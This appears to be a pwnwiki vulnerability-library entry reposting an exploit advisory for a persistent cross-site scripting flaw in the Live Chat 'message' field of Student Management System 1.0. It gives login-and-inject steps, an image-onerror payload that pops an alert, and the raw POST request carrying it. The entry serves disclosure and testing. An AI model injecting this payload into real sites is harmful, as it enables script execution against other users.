免费、自由、人人可编辑的漏洞库
,
XSS
# Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-13 # Exploit Author: mohsen khashei (kh4sh3i) or email protected # Vendor Homepage: https://github.com/amirhamza05/Student-Management-System # Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip # Version: 1.0 # Tested on: ubuntu 20.04.2 # --- Description --- # # The web application allows for an Attacker to inject persistent Cross-Site-Scripting payload in Live Chat. # --- Proof of concept --- # 1- Login to Student Management System 2- Click on Live Chat button 3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image> 5- Xss popup will be triggered. # --- Malicious Request --- # POST /nav_bar_action.php HTTP/1.1 Host: (HOST) Cookie: (PHPSESSID) Content-Length: 96 send_message_chat%5Bmessage%5D=<image src=1 onerror="javascript:alert(document.domain)"></image>
免费、自由、人人可编辑的漏洞库--pwnwiki.com
